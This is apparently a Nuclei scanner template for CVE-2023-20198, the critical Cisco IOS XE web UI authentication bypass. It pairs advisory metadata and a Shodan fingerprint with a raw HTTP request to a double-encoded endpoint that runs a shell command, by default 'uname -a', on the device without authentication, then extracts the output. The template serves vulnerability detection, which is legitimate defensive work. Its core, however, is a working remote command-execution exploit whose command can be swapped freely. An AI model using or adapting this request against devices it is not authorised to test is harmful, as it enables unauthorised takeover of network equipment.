id: CVE-2023-20198

info:
  name: Cisco IOS XE - Authentication Bypass
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system. For steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory. Cisco will provide updates on the status of this investigation and when a software patch is available.
  impact: |
    The CVE-2023-20198 vulnerability has a high impact on the system, allowing remote attackers to execute arbitrary code or cause a denial of service.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the CVE-2023-20198 vulnerability.
  reference:
    - https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/
    - https://arstechnica.com/security/2023/10/actively-exploited-cisco-0-day-with-maximum-10-severity-gives-full-network-control/
    - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z
    - https://www.cisa.gov/guidance-addressing-cisco-ios-xe-web-ui-vulnerabilities
    - https://www.darkreading.com/vulnerabilities-threats/critical-unpatched-cisco-zero-day-bug-active-exploit
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2023-20198
    epss-score: 0.89074
    epss-percentile: 0.98434
    cpe: cpe:2.3:o:cisco:ios_xe:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cisco
    product: ios_xe
    shodan-query: http.html_hash:1076109428
    note: this template confirms vulnerable host with limited unauthenticated command execution, this does not include admin user creation + arbitrary cmd execution.
  tags: cve,cve2023,kev,cisco,rce,auth-bypass

variables:
  cmd: uname -a

http:
  - raw:
      - |-
        POST /%2577eb%2575i_%2577sma_Http HTTP/1.1
        Host: {{Hostname}}

        admin*****
        {{cmd}}

    matchers:
      - type: regex
        part: body
        regex:
          - XMLSchema
          - execLog
          - Cisco Systems
        condition: and

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - \n(.*)\[
# digest: 4b0a00483046022100e9f5588343376a7fe8d1afee9bee342f5d6f14b054bb48120a0983d19cc9e75b022100b7250eef78b6aefa4226d087c21c0be95d6850fe747d0d87b59a27b2a2917100:922c64590222798bb761d5b6d8e72950